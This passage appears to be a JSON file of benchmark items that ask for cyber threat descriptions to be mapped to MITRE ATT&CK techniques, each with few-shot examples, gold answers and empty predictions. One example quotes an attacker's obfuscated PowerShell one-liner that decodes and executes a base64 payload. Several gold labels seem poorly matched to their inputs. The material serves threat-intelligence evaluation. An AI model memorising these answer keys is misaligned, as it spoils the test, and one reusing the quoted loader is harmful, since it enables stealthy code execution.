names.\n\nExamples:\n- Text: HAFNIUM has interacted with Office 365 tenants to gather details regarding target's environments.\n\t - T1592.004: Gather Victim Host Information - Client Configurations\n- Text: QAKBOT can maintain persistence by creating an auto-run Registry key\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n\t - T1587.001: Develop Capabilities - Malware\n", "input": "\nBuilding a client Build configuration Usage scenario Description Debug configuration Testing The pre-defined Settings.cs will be used, so edit this file before compiling the client", "gold": "- T1562.001: Impair Defenses - Disable or Modify Tools\n- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In the past, Emissary Panda has used many ways to target their victims, with the most notable being the exploits from the Hacking Team leak. Usually, the delivered payload is either the well-known \u2018PlugX\u2019 or \u2018HttpBrowser\u2019 RAT, a tool which is believed to have Chinese origins and to be used only by certain Chinese hacking groups\n\t - T1027: Obfuscated Files or Information\n- Text: powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\ProgramData\\ZIPSDK\\ProjectConfManagerNT.ini)))); PowerShell one-liner Encoded text file Execution flow: The PowerShell code When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it\n\t - T1036: Masquerading\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Waterbear can scramble functions not to be executed again with random values.\n\t - T1027.005: Obfuscated Files or Information - Indicator Removal from Tools\n", "input": "\nIts developer used the open source Invoke-Obfuscation tool to obfuscate this PowerShell script, specifically using the COMPRESS technique offered by Invoke-Obfuscation", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In the past we have seen others techniques that used Bitcoin blockchain to hide their C&C server IP address, but in this blog we will share an analysis of the new technique\n\t - T1568: Dynamic Resolution\n- Text: Numbered Panda has a long list of high-profile victims and is known by a number of names including: DYNCALC, IXESHE, JOY RAT, APT-12, etc. Numbered Panda has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. Numbered Panda has targeted organizations in time-sensitive operations such as the Fukushima Reactor Incident of 2011, likely filling intelligence gaps in the ground cleanup/mitigation operations. One of the most interesting techniques that Numbered Panda likes to use is to dynamically calculate the Command and Control (C2) port by resolving a DNS. The malware will typically use two DNS names for communication: one is used for command and control; the other is used with an algorithm to calculate the port to communicate to. There are several variations of the algorithm used to calculate the C2 port, but one of the most common is to multiply the first two octets of the IP address and add the third octet to that value. This is typically represented as: (A * B) + C \u2013 common values might be 200.2.43.X, which would result in communication on port 443. Numbered Panda will frequently use blogs or WordPress in the c2 infrastructure, which helps to make the network traffic look more legitimate. CrowdStrike has observed Numbered Panda targeting high-tech, defense contractors, media organizations, and western governments\n\t - T1568.003: Dynamic Resolution - DNS Calculation\n- Text: Remsec is capable of using DNS for C2.\n\t - T1071.004: Application Layer Protocol - DNS\n", "input": "\nRegular Expressions ([^r-v\\\\s])[r-v]([\\\\w\\\\d+\\\\/=]+)-\\\\w+.(||) Address:\\\\s+(([a-fA-F0-9]{0,4}:{1,4}[\\\\w|:]+){1,8}) Address:\\\\s+(([a-fA-F0-9]{0,4}:{1,2}){1,8}) ([^r-v\\\\s]+)[r-v]([\\\\w\\\\d+\\\\/=]+).(||) (\\\\w+).(||) Address:\\\\s+(\\\\d+.\\\\d+.\\\\d+.\\\\d+) Table 3 Regular expressions used by RogueRobin The C# variant, like its PowerShell relative, will issue DNS queries to determine which query types can successfully communicate with its C2 servers", "gold": "- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HOPLIGHT has used WMI to recompile the Managed Object Format (MOF) files in the WMI repository.\n\t - T1047: Windows Management Instrumentation\n- Text: WMI permanent event subscriptions can be used to trigger actions when specified conditions are met. Attackers often use this functionality to persist the execution of backdoors at system start up. Subscriptions consist of three core WMI classes: a Filter, a Consumer, and a FilterToConsumerBinding. WMI Consumers specify an action to be performed, including executing a command, running a script, adding an entry to a log, or sending an email. WMI Filters define conditions that will trigger a Consumer, including system startup, the execution of a program, the passing of a specified time and many others. Creating a WMI permanent event subscription requires administrative privileges on a system\n\t - T1546.003: Event Triggered Execution - Windows Management Instrumentation Event Subscription\n- Text: SILENTTRINITY tracks `TrustedHosts` and can move laterally to these targets via WinRM.\n\t - T1021.006: Remote Services - Windows Remote Management\n", "input": "\nhas used WMI for execution.", "gold": "- T1047: Windows Management Instrumentation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The main functionality of the macros remained the same as in a previous APT34 campaign: The malicious macros use the MouseAvailable function for evasion, and create a scheduled task to execute a payload embedded within the document\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: The main similarities include the use of a scheduled task to persistently execute on the system, as well as the same general process to communicate with its C2 server\n\t - T1053: Scheduled Task/Job\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: at can be used to schedule a task on a system to be executed at a specific date or time.\n\t - T1053.002: Scheduled Task/Job - At\n", "input": "\nFigure 1: Code from 29[.]html scheduling the first task to run a script from pastebin The second task (\u201cMSOFFICEER\u201d) in Figure 2 runs the script contents of a different page of the same blog, blog-page[.]html, every 100 minutes", "gold": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: performs service discovery using net start commands.\n\t - T1007: System Service Discovery\n- Text: HTTPBrowser has established persistence by setting the \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" key value for \"wdm\" to the path of the executable. It has also used the Registry entry \"HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run vpdn \u201c%ALLUSERPROFILE%\\%APPDATA%\\vpdn\\VPDN_LU.exe\u201d\" to establish persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: LoudMiner can automatically launch at startup if the AutoStart option is enabled in the VBoxVmService configuration file.\n\t - T1547: Boot or Logon Autostart Execution\n", "input": "\ncollects information on programs and services on the victim that are configured to automatically run at startup.", "gold": "- T1007: System Service Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Shamoon creates a new service named \u201cntssrv\u201d that attempts to appear legitimate; the service's display name is \u201cMicrosoft Network Realtime Inspection Service\u201d and its description is \u201cHelps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.\u201d Newer versions create the \"MaintenaceSrv\" service, which misspells the word \"maintenance.\"\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: Empire contains modules that can discover and exploit search order hijacking vulnerabilities.\n\t - T1574.008: Hijack Execution Flow - Path Interception by Search Order Hijacking\n- Text: ComRAT samples have been seen which hijack COM objects for persistence by replacing the path to shell32.dll in registry location \"HKCU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32\".\n\t - T1546.015: Event Triggered Execution - Component Object Model Hijacking\n", "input": "\n\"Are you Happy?\" campaign.\"FreeMilk\" campaign.\"North Korean Human Rights\" campaign.\"Evil New Year 2018\" campaign.On January 2nd of 2018, the \"Evil New Year 2018\" was started", "gold": "- T1543: Create or Modify System Process\n- T1543.003: Create or Modify System Process - Windows Service", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Watches uninstall time, checks time diff (local time vs internet time)\n\t - T1124: System Time Discovery\n- Text: SUNBURST remained dormant after initial access for a period of up to two weeks.\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n- Text: QakBot can use domain generation algorithms in C2 communication.\n\t - T1568.002: Dynamic Resolution - Domain Generation Algorithms\n", "input": "\nThe time of the observed attacker activity coincides with Iran\u2019s Daylight Time, which is +0430 UTC", "gold": "- T1124: System Time Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RTM has the capability to download a VNC module from command and control (C2).\n\t - T1219: Remote Access Software\n- Text: In the period between January and March 2017 the TeleBots attackers compromised a software company in Ukraine (not related to M.E. Doc), and, using VPN tunnels from there, gained access to the internal networks of several financial institutions\n\t - T1133: External Remote Services\n- Text: Figure 4 \u2013 Backdoored authentication function in SSH server As you can see in Figure 4, this version of Dropbear SSH will authenticate the user if the password passDs5Bu9Te7 was entered\n\t - T1021: Remote Services\n", "input": "\nused legitimate programs such as AmmyAdmin and Team Viewer for remote interactive C2 to target systems.", "gold": "- T1219: Remote Access Software", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT28 downloads and executes PowerShell scripts and performs PowerShell commands.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: GoldenSpy's uninstaller has base64-encoded its variables.\n\t - T1027: Obfuscated Files or Information\n- Text: Lazarus Group has used a custom hashing method to resolve APIs used in shellcode.\n\t - T1027.007: Obfuscated Files or Information - Dynamic API Resolution\n", "input": "\nInvoke-Obfuscation calls the string obfuscation used by the actors to further obfuscate this script Reorder, which uses the string formatting functionality within PowerShell to reconstruct strings from out of order substrings (ex", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: WhisperGate can download additional payloads hosted on a Discord channel.\n\t - T1102: Web Service\n- Text: APT29 has used social media platforms to hide communications to C2 servers.\n\t - T1102.002: Web Service - Bidirectional Communication\n- Text: OopsIE uses HTTP for C2 communications.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nAll subsequent interaction with the C2 server uses the same SOAP web service, so we will not show all of the generated HTTP requests", "gold": "- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can be used to enumerate security software currently running on a system by process name of known products.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: POWRUNER may also receive batch commands from the C2 server to collect host information from the system\n\t - T1083: File and Directory Discovery\n\t - T1057: Process Discovery\n\t - T1047: Windows Management Instrumentation\n\t - T1049: System Network Connections Discovery\n\t - T1016: System Network Configuration Discovery\n\t - T1082: System Information Discovery\n\t - T1033: System Owner/User Discovery\n- Text: Bumblebee can use WMI to gather system information and to spawn processes for code injection.\n\t - T1047: Windows Management Instrumentation\n", "input": "\nchecks for anti-malware products and processes.", "gold": "- T1518.001: Software Discovery - Security Software Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Since then, the threat actors have expanded delivery to include malicious spam campaigns, RDP attacks, and other attack vectors. In other reports, threat actors breached at least three managed service providers (MSPs) and used the access to deploy REvil to the MSPs' customers\n\t - T1566: Phishing\n- Text: In this section, we describe how the various payloads are delivered based on what we have seen in our customer networks, as well as what we have established through open-source research. Unit 42 has yet to see any evidence of weaponized documents used to deliver BackConfig being attached on phishing emails and that phishing URL links in emails appear to be the Hangover group\u2019s modus operandi\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: Cobalt Group has sent spearphishing emails with various attachment types to corporate and personal email accounts of victim organizations. Attachment types have included .rtf, .doc, .xls, archives containing LNK files, and password protected archives containing .exe and .scr executables.\n\t - T1566.001: Phishing - Spearphishing Attachment\n", "input": "\nCyber threat groups\u2019 access to the media organization\u2019s networks could potentially provide the government advance warning on upcoming protests, information on pro-democracy group leaders, and insights needed to disrupt activity on the Internet, such as what occurred in mid-2014 when several websites were brought down in denial of service attacks.[8] Threat Actors Use Spear Phishing Written in Traditional Chinese Script in Attempted Intrusions In August 2015, the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations, including newspapers, radio, and television", "gold": "- T1598.003: Phishing for Information - Spearphishing Link", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HotCroissant has the ability to retrieve a list of services on the infected host.\n\t - T1007: System Service Discovery\n- Text: Carbanak lists running processes.\n\t - T1057: Process Discovery\n- Text: has a plugin that can perform ARP scanning as well as port scanning.\n\t - T1046: Network Service Discovery\n", "input": "\nAfter compromising a victim, discovers all running services.", "gold": "- T1007: System Service Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Anchor can execute payloads via shell scripting.\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n- Text: The attackers manually send a command to the JS or C# component to drop and execute a batch file from one of their servers. That batch file writes a malicious INF file and supplies it as a parameter to the Microsoft utility cmstp.exe, which executes a remote scriptlet specified in the INF file. This technique has been documented in the MITRE ATT&CK knowledge base as CMSTP; an example of how this technique is used may be found here. This technique has been used in the past by Cobalt, another financially motivated group. The remote scriptlet contains obfuscated JS code that drops an OCX file and executes it via regsvr32.exe\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n- Text: Bundlore can use AppleScript to inject malicious JavaScript into a browser.\n\t - T1059.002: Command and Scripting Interpreter - AppleScript\n", "input": "\nuses macOS' .command file type to script actions.", "gold": "- T1064: Scripting", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KONNI has modified ComSysApp service to load the malicious DLL payload.\n\t - T1546.015: Event Triggered Execution - Component Object Model Hijacking\n- Text: This update to Emissary allowed the Trojan to run as a service. The configuration now contains settings for the Emissary service, which the Trojan will store in and access from the following registry keys:\n\t - T1574.011: Hijack Execution Flow - Services Registry Permissions Weakness\n- Text: Kazuar can install itself as a new service.\n\t - T1543.003: Create or Modify System Process - Windows Service\n", "input": "\nhas batch files that modify the system service COMSysApp to load a malicious DLL.", "gold": "- T1543.003: Create or Modify System Process - Windows Service", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: adds a .lnk file to the Windows startup folder.\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: creates a shortcut file and saves it in a Startup folder to establish persistence.\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: MarkiRAT can masquerade as \"update.exe\" and \"svehost.exe\"; it has also mimicked legitimate Telegram and Chrome files.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n", "input": "\nThis file is then copied to a filename of \u2018Windows Update.lnk\u2019, which is placed in the startup path previously identified", "gold": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Penquin can remove strings from binaries.\n\t - T1027.005: Obfuscated Files or Information - Indicator Removal from Tools\n- Text: macOS.OSAMiner has used run-only Applescripts, a compiled and stripped version of AppleScript, to remove human readable indicators to evade detection.\n\t - T1027.008: Obfuscated Files or Information - Stripped Payloads\n- Text: KONNI is heavily obfuscated and includes encrypted configuration files.\n\t - T1027: Obfuscated Files or Information\n", "input": "\nThe code comparison specifically shows the HighShell code including a salt variable containing di2zag7wZHTK9YR0NGq, which is not present within the TwoFace code on the left", "gold": "- T1140: Deobfuscate/Decode Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The use of the web bug reconnaissance technique suggests TA416 is being more discerning about which targets the group chooses to deliver malware payloads. Historically, the group primarily delivered web bug URLs alongside malware URLs to confirm receipt. In 2022, the group started to first profile users and then deliver malware URLs. This may be an attempt by TA416 to avoid having their malicious tools discovered and publicly disclosed. By narrowing the lens of targeting from broad phishing campaigns to focus on targets that have proven to be active and willing to open emails, TA416 increases its chance of success when following up with malicious malware payloads\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: The infection chain starts with an email in which the victim receives a download link that fetches the first-stage downloader. As we found in our analysis, this first-stage downloader is responsible for fetching a malicious MSI file hosted on an\u00a0attacker-controlled GitHub page. This MSI file is downloaded and executed on the endpoint. As a result, a malicious Python-compiled binary is dropped on the file system, which uses the Dropbox API for command-and-control (C&C) communication\n\t - T1566.002: Phishing - Spearphishing Link\n\t - T1105: Ingress Tool Transfer\n\t - T1102.002: Web Service - Bidirectional Communication\n\t - T1204.001: User Execution - Malicious Link\n- Text: Sidewinder has sent e-mails with malicious links to credential harvesting websites.\n\t - T1598.003: Phishing for Information - Spearphishing Link\n", "input": "\nhas sent spearphising emails with malicious links to potential victims.", "gold": "- T1598.003: Phishing for Information - Spearphishing Link", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Misdat is capable of downloading files from the C2.\n\t - T1105: Ingress Tool Transfer\n- Text: Use of Open Source Tools In an attempt to avoid detection and as an anti-analysis tactic, the OilRig group abused an open source tool called Invoke-Obfuscation to obfuscate the code used for QUADAGENT. Invoke-Obfuscation is freely available via a Github repository and allows a user to change the visual representation of a PowerShell script simply by selecting the desired obfuscation techniques. Invoke-Obfuscation offers a variety of obfuscation techniques, and by analyzing the script we were able to ascertain the specific options in this attack. After identifying the specific options used to obfuscate QUADAGENT, we were able to deobfuscate the PowerShell script and perform additional analysis. We found two obfuscation techniques applied to the script: the first one changing the representation of variables; the second one changing the representation of strings in the script. Invoke-Obfuscation calls the string obfuscation used by the actors to further obfuscate this script Reorder, which uses the string formatting functionality within PowerShell to reconstruct strings from out of order substrings (ex. 1}{0}\" -f 'bar','foo'). During our analysis, we installed Invoke-Obfuscation and used it to obfuscate a previously collected QUADAGENT sample to confirm our analysis\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: has used bitsadmin.exe to download additional tools.\n\t - T1197: BITS Jobs\n", "input": "\ncan download files.", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: InvisiMole uses WinRAR to compress data that is intended to be exfiltrated.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: InvisiMole can use zlib to compress and decompress data.\n\t - T1560.002: Archive Collected Data - Archive via Library\n- Text: Dragonfly has compressed data into .zip files prior to exfiltration.\n\t - T1560: Archive Collected Data\n", "input": "\nhas used RAR to compress files before moving them outside of the victim network.", "gold": "- T1560: Archive Collected Data", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: As discussed in the delivery document\u00a0analysis above,\u00a0depending on the OS architecture either of the embedded\u00a0KerrDown\u00a0DLLs\u00a0will be dropped in the victim machine. The\u00a0DLL\u00a0is dropped in the directory location \u2018Users\\Administrator\\AppData\\Roaming\\\u2019\u00a0as \u2018main_background.png\u2019.\u00a0The DLL retrieves the payload from\u00a0the\u00a0URL, decrypts it by using DES algorithm and\u00a0execute it\u00a0in\u00a0the\u00a0memory. Therefore, it is observed that only the\u00a0KerrDown\u00a0DLL\u00a0downloader is saved in the system and the payload directly gets executed in the memory without being written in the system. Table\u00a01\u00a0shows the\u00a0URL\u00a0the downloader will attempt to download the payload from depending on the\u00a0OS architecture of the victim machine\n\t - T1105: Ingress Tool Transfer\n- Text: leverages social networking sites and cloud platforms (AOL, Twitter, Yandex, Mediafire, pCloud, Dropbox, and Box) for C2.\n\t - T1102: Web Service\n- Text: Zeus Panda uses PowerShell to download and execute the payload.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", "input": "\ncan retrieve an additional payload from its C2 server.", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The first plist, ~/Library/LaunchAgents/com.safarii.extension.plist, does not use a StartInterval value like the Chrome variant, but instead uses RunAtLoad. The RunAtLoad parameter is executed when the user logs into their computer. Note that the plist file does not use the correct spelling of Safari. \n\t - T1647: Plist File Modification\n- Text: ZLib mimics the resource version information of legitimate Realtek Semiconductor, Nvidia, or Synaptics modules.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: The agent control panel has three tabs that have interfaces that allow the actor to issue commands, as well as upload and download files to and from the agent\n\t - T1543.001: Create or Modify System Process - Launch Agent\n\t - T1105: Ingress Tool Transfer\n", "input": "\nFigure 7: Property list file in LaunchAgents directory To camouflage the location of the malicious file, Keydnap replaces argv[0] with /usr/libexec/icloudsyncd\u00a0\u2013launchd\u00a0netlogon.bundle", "gold": "- T1083: File and Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: NOKKI uses the Windows call SetWindowsHookEx and begins injecting it into every GUI process running on the victim's machine.\n\t - T1056.004: Input Capture - Credential API Hooking\n- Text: Pteranodon can use a dynamic Windows hashing algorithm to map API components.\n\t - T1027.007: Obfuscated Files or Information - Dynamic API Resolution\n- Text: Hacking Team UEFI Rootkit is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.\n\t - T1014: Rootkit\n\t - T1542.001: Pre-OS Boot - System Firmware\n", "input": "\nhooks processes by modifying IAT pointers to 